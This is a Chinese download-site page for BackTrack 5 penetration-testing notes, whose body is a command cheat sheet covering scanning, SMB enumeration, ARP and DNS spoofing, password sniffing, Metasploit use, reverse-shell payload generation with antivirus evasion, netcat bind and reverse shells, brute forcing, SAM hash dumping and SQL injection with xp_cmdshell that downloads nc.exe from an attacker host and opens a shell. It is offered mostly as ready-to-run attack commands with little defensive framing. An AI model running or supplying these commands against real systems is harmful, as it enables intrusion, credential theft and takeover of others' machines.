• 红软基地:您身边最放心的安全下载站!
您所在的位置:首页 > 软件 > 应用软件 > 教育学习 > BackTrack渗透测试笔记

BackTrack渗透测试笔记

软件类型:
国产软件
软件语言:
简体中文
软件大小:
6 MB
软件授权:
免费软件
软件评级:
4
更新时间:
2017-05-25
应用平台:
WinXP, Win7, WinAll
软件简介

BackTrack渗透测试笔记是一款BT5学习笔记,使用BT5的同学可以看看,不仅仅是用来破解WIFI,BT5还有更强大的功能。 体积小,但功能强大。界面非常清爽,简单易操作。WzJ红软基地

软件功能

0x01.1 PTES 标准中的渗透测试阶段WzJ红软基地
0x01.1.1 前期交互阶段WzJ红软基地
0x01.1.2 情报搜集阶段WzJ红软基地
0x01.1.3 威胁建模阶段WzJ红软基地
0x01.1.4 漏洞分析阶段WzJ红软基地
0x01.1.5 渗透攻击阶段WzJ红软基地
0x01.1.6 后渗透攻击阶段WzJ红软基地
0x01.1.7 报告阶段WzJ红软基地
0x01.2 渗透测试类型WzJ红软基地
0x01.2.1 白盒测试WzJ红软基地
0x01.2.2 黑盒测试WzJ红软基地
0x01.3 小结WzJ红软基地
0x02 渗透环境搭建WzJ红软基地
>WzJ红软基地
0x03 常用信息收集WzJ红软基地
0x03.1 被动信息收集WzJ红软基地
0x03.2 主动信息收集WzJ红软基地
0x03.3 针对性扫描WzJ红软基地
0x03.4 小结WzJ红软基地
0x04 信息收集的附属工作WzJ红软基地
0x04.1 基本的漏洞扫描WzJ红软基地
0x04.2 使用 Nessus 进行扫描WzJ红软基地
0x04.3 专用漏洞扫描器WzJ红软基地
0x05 社会工程学攻击WzJ红软基地
0x05.1 针对性的钓鱼攻击WzJ红软基地
0x05.2 web 向量攻击WzJ红软基地
0x05.3 SET 的其他特性WzJ红软基地
0x05.4 小结。WzJ红软基地

软件说明

ping 域名/ip 测试本机到远端主机是否联通。WzJ红软基地
dig 域名/ip 查看域名解析的详细信息。WzJ红软基地
host -l 域名 dns服务器 传输zone。WzJ红软基地
扫描WzJ红软基地
nmap:WzJ红软基地
-sS 半开扫描TCP和SYN扫描。WzJ红软基地
-sT 完全TCP连接扫描。WzJ红软基地
-sU UDP扫描WzJ红软基地
-PS syn包探测(防火墙探测)WzJ红软基地
-PA ack包探测(防火墙探测)WzJ红软基地
-PN 不ping。WzJ红软基地
-n 不dns解析。WzJ红软基地
-A -O和-sV。WzJ红软基地
-O 操作系统识别。WzJ红软基地
-sV 服务版本信息(banner)WzJ红软基地
-p 端口扫描。WzJ红软基地
-T 设置时间级别(0-5)WzJ红软基地
-iL 导入扫描结果。WzJ红软基地
-oG 输出扫描结果。WzJ红软基地
操作系统识别:WzJ红软基地
p0f -i eth0 -U -p 开启混杂模式。WzJ红软基地
xprobe2 ip|域名 检测os。WzJ红软基地
banner获取:WzJ红软基地
nc ip port 检测端口是否打开。WzJ红软基地
telnet ip port 检测端口是否打开。WzJ红软基地
wget ip 下载主页。WzJ红软基地
cat index.html | more 显示主页代码。WzJ红软基地
q 退出。WzJ红软基地
windows枚举WzJ红软基地
nmap -sS -p 139,445 ip 扫描windows。WzJ红软基地
cd /pentest/enumeration/smb-enumWzJ红软基地
nbtscan -f targetIP 检测netbios。WzJ红软基地
smbgetserverinfo -i targetIP 扫描name,os,组。WzJ红软基地
smbdumpusers -i targetIP 列出用户。WzJ红软基地
smbclient -L //targetIP 列出共享。WzJ红软基地
使用windows:WzJ红软基地
net use \\ip\ipc$ "" /u:"" 开启空会话。WzJ红软基地
net view \\ip 显示共享信息。WzJ红软基地
smbclient:WzJ红软基地
smbclient -L hostName -I targetIP 枚举共享。WzJ红软基地
smbclient -L hostName/share -U "" 用空用户连接。WzJ红软基地
smbclient -L hostName -I targetIP -U admin普通用户连接。WzJ红软基地
rpcclient:WzJ红软基地
rpcclient targetIP -U ""打开一个空会话。WzJ红软基地
netshareenum 枚举共享。WzJ红软基地
enumdomusers 枚举用户。WzJ红软基地
lsaenumsid 枚举域SID。WzJ红软基地
queryuser RID 查询用户信息。WzJ红软基地
createdomuser 创建用户访问。WzJ红软基地
ARP欺骗:WzJ红软基地
ettercap:WzJ红软基地
nano /usr/local/etc/etter.conf配置文件WzJ红软基地
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡WzJ红软基地
Hosts > Scan for hosts (do this two times)扫描网段的主机WzJ红软基地
Hosts > Hosts list 显示主机列表WzJ红软基地
Select the default gateway > Add to Target 1 添加主机WzJ红软基地
Select the target > Add to Target 2 添加主机WzJ红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击WzJ红软基地
Start > Start sniffing 开始攻击WzJ红软基地
dsniff -i eth0 监听网卡窃听登录用户密码WzJ红软基地
urlsnarf -i eth0 嗅探http请求WzJ红软基地
msgsnarf -i eth0 嗅探聊天软件的聊天内容WzJ红软基地
driftnet -i eth0 网络管理嗅探图片,音频。WzJ红软基地
dns欺骗:WzJ红软基地
nano /usr/local/share/ettercap/etter.dns编辑配置文件WzJ红软基地
Plugins > Manage the plugins > dns_spoof 设置dns欺骗WzJ红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARPWzJ红软基地
Start > Start sniffing 开始攻击WzJ红软基地
Exploits漏洞利用:WzJ红软基地
cd /pentest/exploits/exploit-db 进入目录WzJ红软基地
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞WzJ红软基地
cat exploit | grep "#include"检查运行环境WzJ红软基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码WzJ红软基地
Metasploit:WzJ红软基地
svn update 升级WzJ红软基地
./msfweb Web接口127.0.0.1:55555。.WzJ红软基地
./msfconsole 字符下的Console。WzJ红软基地
help 帮助WzJ红软基地
show <option> 显示选项WzJ红软基地
search <name> 搜索名字WzJ红软基地
use <exploit name> 使用漏洞WzJ红软基地
show options 显示选项WzJ红软基地
set <OPTION NAME> <option> 设置选项WzJ红软基地
show payloads 显示装置WzJ红软基地
set PAYLOAD <payload name> 设置装置WzJ红软基地
show options 显示选项WzJ红软基地
set <OPTION NAME> <option> 设置选项WzJ红软基地
show targets 显示目标(os版本)WzJ红软基地
set TARGET <target number> 设置目标版本WzJ红软基地
exploit 开始漏洞攻击WzJ红软基地
sessions -l 列出会话WzJ红软基地
sessions -i <ID> 选择会话WzJ红软基地
sessions -k <ID> 结束会话WzJ红软基地
<ctrl> z 把会话放到后台WzJ红软基地
<ctrl> c 结束会话WzJ红软基地
jobs 列出漏洞运行工作WzJ红软基地
jobs -K 结束一个漏洞运行工作WzJ红软基地
show auxiliary 显示辅助模块WzJ红软基地
use <auxiliary name> 使用辅助模块WzJ红软基地
set <OPTION NAME> <option> 设置选项WzJ红软基地
run 运行模块WzJ红软基地
scanner/smb/version 扫描系统版本WzJ红软基地
scanner/mssql/mssql_ping 测试mssql是否在线WzJ红软基地
scanner/mssql/mssql_login 测试登录(暴力或字典)WzJ红软基地
Attacker behind firewall: bind shell正向WzJ红软基地
Target behind firewall: reverse shell反向WzJ红软基地
Meterpreter衔接不懂dos的可以用这个:WzJ红软基地
db_import_nessus_nbe 加载nessus的扫描结果WzJ红软基地
db_import_nmap_xml 加载nmap的扫描结果WzJ红软基地
自动化攻击流程:WzJ红软基地
cd /pentest/exploit/framework3WzJ红软基地
./msfconsoleWzJ红软基地
load db_sqlite3WzJ红软基地
db_destroy pentestWzJ红软基地
db_create pentestWzJ红软基地
db_nmap targetIPWzJ红软基地
db_hostsWzJ红软基地
db_servicesWzJ红软基地
db_autopwn -t -p -eWzJ红软基地
字符接口攻击流程:WzJ红软基地
./msfcli | grep -i <name>WzJ红软基地
./msfcli <exploit or auxiliary> SWzJ红软基地
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> EWzJ红软基地
做木马后门等:WzJ红软基地
./msfpayload <payload> <variable=value> <output type>WzJ红软基地
S summary and options of payloadWzJ红软基地
C C languageWzJ红软基地
P PerlWzJ红软基地
y RubyWzJ红软基地
R Raw, allows payload to be piped into msfencode and other toolsWzJ红软基地
J JavaScriptWzJ红软基地
X Windows executableWzJ红软基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 CWzJ红软基地
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exeWzJ红软基地
编码处理就是做免杀:WzJ红软基地
./msfencode <options> <variable=value>WzJ红软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -lWzJ红软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t cWzJ红软基地
入侵后在windows下添加管理员用户:WzJ红软基地
hostname 查看主机名WzJ红软基地
net users 查看用户WzJ红软基地
net user 用户 密码 /add 添加用户WzJ红软基地
net localgroup 查看工作组WzJ红软基地
net localgroup administrators 查看管理员组WzJ红软基地
net localgroup administrators x /add 将用户加入管理员组WzJ红软基地
TFTPWzJ红软基地
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上WzJ红软基地
tftp -i 10.1.1.2 GET nc.exe下载WzJ红软基地
netcat瑞士军刀WzJ红软基地
attacker: 10.1.1.1WzJ红软基地
target: 10.1.1.2WzJ红软基地
nc -v -z 10.1.1.2 1-1024 端口扫描WzJ红软基地
target: nc -lvp 4444 聊天设置(服务)WzJ红软基地
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)WzJ红软基地
target: nc -lvp 4444 > output.txt传输文件(接受)WzJ红软基地
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)WzJ红软基地
target: nc -lvp 4444 -e cmd.exe Bind shell。WzJ红软基地
attacker: nc -v 10.1.1.2 4444WzJ红软基地
target:nc -lvp 4444 Reverse shell。WzJ红软基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bashWzJ红软基地
密码WzJ红软基地
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > wordsWzJ红软基地
cat words | wc -l显示个数(30多万个)WzJ红软基地
暴力:WzJ红软基地
hydra -l ftp -P words -v targetIP ftp 攻击ftp。WzJ红软基地
hydra -l muts -P words -v targetIP pop3 攻击pop3WzJ红软基地
hydra -P words -v targetIP snmp 攻击snmpWzJ红软基地
攻击microsof VPNWzJ红软基地
nmap -p 1723 targetIPWzJ红软基地
dos2unix wordsWzJ红软基地
cat words | thc-pptp-bruter targetIPWzJ红软基地
WYD:WzJ红软基地
wget -r target.com –accept=pdf 下载pdf文档WzJ红软基地
wyd.pl -o output.txt .target.com/WzJ红软基地
cat output.txt | moreWzJ红软基地
SAM文件(windows下的密码文件):WzJ红软基地
%SYSTEMROOT%/system32/configWzJ红软基地
%SYSTEMROOT%/repairWzJ红软基地
备份windows的hash文件:WzJ红软基地
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp EWzJ红软基地
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\WzJ红软基地
meterpreter > execute -f cmd -cWzJ红软基地
meterpreter > interact xWzJ红软基地
C:\WINDOWS\system32> pwdump \\127.0.0.1WzJ红软基地
john破解密码:WzJ红软基地
cp hash.txt /pentest/password/john-1.7.2/run/WzJ红软基地
cd /pentest/password/john-1.7.2/run/WzJ红软基地
./john hash.txtWzJ红软基地
彩虹表:WzJ红软基地
rcrack *.rt -f hash.txtWzJ红软基地
本地修改密码:WzJ红软基地
mountWzJ红软基地
umount /mnt/hda1WzJ红软基地
modprobe fuseWzJ红软基地
ntfsmount /dev/hda1 /mnt/hda1WzJ红软基地
mountWzJ红软基地
ls -l /mnt/hda1 挂载c盘WzJ红软基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txtWzJ红软基地
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件WzJ红软基地
直接修改sam文件:WzJ红软基地
chntpw /mnt/sda1/WINDOWS/system32/config/SAMWzJ红软基地
Blank the password. *WzJ红软基地
Do you really wish to change it? yWzJ红软基地
Write hive files? yWzJ红软基地
unmount /mnt/sda1WzJ红软基地
rebootWzJ红软基地
SQL 注入WzJ红软基地
nmap -sS -p 1521 targetIP 扫描oracleWzJ红软基地
nmap -sS -p T:1433,U:1434 targetIP 扫描mssqlWzJ红软基地
' or 1=1–验证旁路WzJ红软基地
列举表名:WzJ红软基地
' having 1=1–WzJ红软基地
' group by table having 1=1–WzJ红软基地
' group by table, table2 having 1=1–WzJ红软基地
' group by table, table2, table3 having 1=1–WzJ红软基地
列举列类型:WzJ红软基地
union select sum(column) from table –WzJ红软基地
union select sum(column2) from table –WzJ红软基地
添加数据:WzJ红软基地
' ; insert into table values('value','value2′,'value3′)–WzJ红软基地
MSSQL存储程序:WzJ红软基地
输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。WzJ红软基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.htmlWzJ红软基地
运行ipconfig在浏览器查看信息。WzJ红软基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txtWzJ红软基地
上传后门。WzJ红软基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –WzJ红软基地
攻击者: nc -lvp 53WzJ红软基地
spreadfold。WzJ红软基地

相关介绍

bt5,全称Back Track five,是继bt3,bt4之后的最新版。这是一个linux环境的便携系统,可以放到U盘或者硬盘中启动,对本身硬盘没有影响,无需在本地安装。内置大量的网络安全检测工具以及黑客破解软件等。WzJ红软基地

软件截图

BackTrack渗透测试笔记WzJ红软基地

软件下载地址
BackTrack渗透测试笔记
软件推荐
下载排行

精品软件

热门关键词

热门软件推荐